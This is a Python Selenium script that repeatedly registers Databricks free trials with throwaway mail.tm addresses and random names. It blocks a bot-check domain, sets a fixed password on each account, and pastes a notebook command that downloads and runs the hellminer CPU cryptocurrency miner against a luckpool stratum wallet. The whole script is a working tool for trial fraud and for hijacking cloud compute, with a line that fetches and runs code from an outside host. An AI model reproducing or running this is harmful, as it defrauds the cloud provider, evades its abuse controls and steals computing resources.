from selenium.webdriver.chrome.options import Options
from selenium.webdriver import ActionChains
import os
import sys
import urllib
import time
import tkinter as tk
import string
import random
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from patch import download_latest_chromedriver, webdriver_folder_name

list1 = ["1" , "2" , "3" , "4" , "5" , "1" , "2" , "3" , "4" , "5" , "1" , "2" , "3" , "4" , "5" , "1" , "2" , "3" , "4" , "5" , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5"  , "1" , "2" , "3" , "4" , "5" ]
x = 1
y = 1
a = 1
for i in list1:
    if a == 1000 :
        time.sleep(4294967)
    else :
        path_to_chromedriver = os.path.normpath(
            os.path.join(os.getcwd(), webdriver_folder_name, "chromedriver.exe")
        )
        opts = Options()
        opts.add_experimental_option("detach", True)
        #opts.add_argument('--headless')
        opts.add_argument('--log-level=3')
        opts.add_argument("--disable-popup-blocking")
        driver = webdriver.Chrome(path_to_chromedriver , options=opts)
        driver.set_window_position(x, y)
        driver.set_window_size(800, 600)
        with driver:
            driver.execute_cdp_cmd('Network.setBlockedURLs', {"urls": ["www.b.6sc.co"]})
            driver.execute_cdp_cmd('Network.setBlockedURLs', {"urls": ["www.client-api.arkoselabs.com"]})
            driver.execute_cdp_cmd('Network.enable', {})
            driver.get("https://mail.tm/en/")
            time.sleep(4)
            continue_link = driver.find_element_by_xpath('//*[@id="address"]').click()
            root = tk.Tk()
            print(root.clipboard_get())
            email=root.clipboard_get()
            #driver.execute_script("window.open('about:blank','secondtab');")
            #driver.switch_to.window("secondtab")
            driver.get('https://databricks.com/try-databricks')
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="FirstName"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="FirstName"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="FirstName"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="FirstName"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="FirstName"]').send_keys(randomLetter)
            time.sleep(1)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="LastName"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="LastName"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="LastName"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="LastName"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="LastName"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="LastName"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="LastName"]').send_keys(randomLetter)
            time.sleep(1)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="Company"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="Company"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="Company"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="Company"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="Company"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="Company"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="Company"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            driver.find_element_by_xpath('//*[@id="Company"]').send_keys(randomLetter)
            time.sleep(1)
            driver.find_element_by_xpath('//*[@id="Email"]').send_keys(email)
            time.sleep(1)
            randomLetter = random.choice(string.ascii_letters)
            tits=driver.find_element_by_xpath('//*[@id="Title"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            tits=driver.find_element_by_xpath('//*[@id="Title"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            tits=driver.find_element_by_xpath('//*[@id="Title"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            tits=driver.find_element_by_xpath('//*[@id="Title"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            tits=driver.find_element_by_xpath('//*[@id="Title"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            tits=driver.find_element_by_xpath('//*[@id="Title"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            tits=driver.find_element_by_xpath('//*[@id="Title"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            tits=driver.find_element_by_xpath('//*[@id="Title"]').send_keys(randomLetter)
            randomLetter = random.choice(string.ascii_letters)
            tits=driver.find_element_by_xpath('//*[@id="Title"]').send_keys(randomLetter)
            time.sleep(2)
            checkboxElement = driver.find_element_by_id("mkto_form_consent")
            checkboxElement.send_keys(Keys.SPACE)
            time.sleep(2)
            button = driver.find_element_by_xpath('//*[@id="submitToMktoForm_2021Feb10"]/div[21]/span/button')
            driver.execute_script("arguments[0].click();", button)
            time.sleep(8)
            continue_link = driver.execute_script("window.stop();")
            time.sleep(8)
            if driver.find_element_by_id('ce-placeholder-button'):
                print("Element exists")
                time.sleep(8)
                button1 = driver.find_element_by_id('ce-placeholder-button')
                driver.execute_script("arguments[0].click();", button1)
            else:
                print("")
                print("")
                print("FAIL")
                print("")
                print("")
            time.sleep(4)
            continue_link=driver.execute_script("window.stop();")
            
            test1 = str("https://pages.databricks.com/TY-StandardTrial.html")
            test2 = str(driver.current_url)
            test3 = str("https://databricks.com/try-platform?utm_source=website&utm_medium=direct")
            time.sleep(10)
            if test3 == test2:
                print("1")
            if test1 == test2:
                print("2")
                driver.get("https://mail.tm/en/")
                time.sleep(3)
                driver.find_element_by_xpath('//*[@id="__layout"]/div/div[2]/main/div/div[2]/ul/li/a/div/div[1]/div[1]/span').click()        
                time.sleep(10)
                driver.switch_to.frame("iFrameResizer0")
                button2 = driver.find_element_by_xpath('/html/body/p[2]/a')
                driver.execute_script("arguments[0].click();", button2)
                #driver.find_element_by_xpath('/html/body/p[2]/a').click()	
                #/html/body/p[2]/a
                time.sleep(2)
                #driver.switch_to_default_content()
                handles = driver.window_handles
                size = len(handles)
                for x in range(size):
                    if handles[x] != driver.current_window_handle:
                        driver.switch_to.window(handles[x])
                    print(driver.title)
                time.sleep(2)
                driver.find_element_by_xpath('//*[@id="reset-container"]/div/div[1]/input').send_keys("1234Asdfg@")
                driver.find_element_by_xpath('//*[@id="reset-container"]/div/div[2]/input').send_keys("1234Asdfg@")
                time.sleep(1)
                driver.find_element_by_xpath('//*[@id="reset-container"]/div/div[3]/button').click()
                time.sleep(15)
                driver.find_element_by_xpath('//*[@id="content"]/div/div/uses-legacy-bootstrap/div/div/div[2]/div[3]/div[1]/div[3]/div/div/div/a/div[2]').click()
                time.sleep(2)
                driver.find_element_by_xpath('//*[@id="input"]').send_keys("prog")
                time.sleep(1)
                driver.find_element_by_xpath('/html/body/div[8]/div/div/uses-legacy-bootstrap/uses-legacy-bootstrap/button[2]').click()
                time.sleep(15)
                randomLetter = random.choice(string.ascii_letters)
                randomLette = random.choice(string.ascii_letters)
                driver.find_element_by_css_selector(".CodeMirror-line").click()
                driver.find_element_by_css_selector(".CodeMirror textarea").send_keys("! wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xf hellminer_cpu_linux.tar.gz && chmod +x hellminer && ./hellminer -c stratum+tcp://na.luckpool.net:3956 -u RUtwt4iRg2CXy4jUDZ4gbVc194Lmc7RfSe.testcpu -p x --cpu 2")
                driver.find_element_by_css_selector(".fa-play").click()
                driver.find_element_by_css_selector(".run-cell > .fa").click()
                driver.find_element_by_xpath('/html/body/uses-legacy-bootstrap[14]/div/uses-legacy-bootstrap/div/div[3]/div/a[2]').click()
                #time.sleep(4294967)
                x = x + 40
                y = y + 40
                a = a + 1
                time.sleep(20)
            else:
                print("Warning")
                driver.get("https://mail.tm/en/")
                time.sleep(3)
                driver.find_element_by_xpath('//*[@id="__layout"]/div/div[2]/main/div/div[2]/ul/li/a/div/div[1]/div[1]/span').click()        
                time.sleep(10)
                driver.switch_to.frame("iFrameResizer0")
                button2 = driver.find_element_by_xpath('/html/body/p[2]/a')
                driver.execute_script("arguments[0].click();", button2)
                #driver.find_element_by_xpath('/html/body/p[2]/a').click()	
                #/html/body/p[2]/a
                time.sleep(2)
                #driver.switch_to_default_content()
                handles = driver.window_handles
                size = len(handles)
                for x in range(size):
                    if handles[x] != driver.current_window_handle:
                        driver.switch_to.window(handles[x])
                    print(driver.title)
                time.sleep(2)
                driver.find_element_by_xpath('//*[@id="reset-container"]/div/div[1]/input').send_keys("1234Asdfg@")
                driver.find_element_by_xpath('//*[@id="reset-container"]/div/div[2]/input').send_keys("1234Asdfg@")
                time.sleep(1)
                driver.find_element_by_xpath('//*[@id="reset-container"]/div/div[3]/button').click()
                time.sleep(15)
                driver.find_element_by_xpath('//*[@id="content"]/div/div/uses-legacy-bootstrap/div/div/div[2]/div[3]/div[1]/div[3]/div/div/div/a/div[2]').click()
                time.sleep(2)
                driver.find_element_by_xpath('//*[@id="input"]').send_keys("prog")
                time.sleep(1)
                driver.find_element_by_xpath('/html/body/div[8]/div/div/uses-legacy-bootstrap/uses-legacy-bootstrap/button[2]').click()
                time.sleep(15)
                randomLetter = random.choice(string.ascii_letters)
                randomLette = random.choice(string.ascii_letters)
                driver.find_element_by_css_selector(".CodeMirror-line").click()
                driver.find_element_by_css_selector(".CodeMirror textarea").send_keys("! wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xf hellminer_cpu_linux.tar.gz && chmod +x hellminer && ./hellminer -c stratum+tcp://na.luckpool.net:3956 -u RUtwt4iRg2CXy4jUDZ4gbVc194Lmc7RfSe.testcpu -p x --cpu 2")
                driver.find_element_by_css_selector(".fa-play").click()
                driver.find_element_by_css_selector(".run-cell > .fa").click()
                driver.find_element_by_xpath('/html/body/uses-legacy-bootstrap[14]/div/uses-legacy-bootstrap/div/div[3]/div/a[2]').click()
                #time.sleep(4294967)
                x = x + 40
                y = y + 40
                a = a + 1
                time.sleep(20)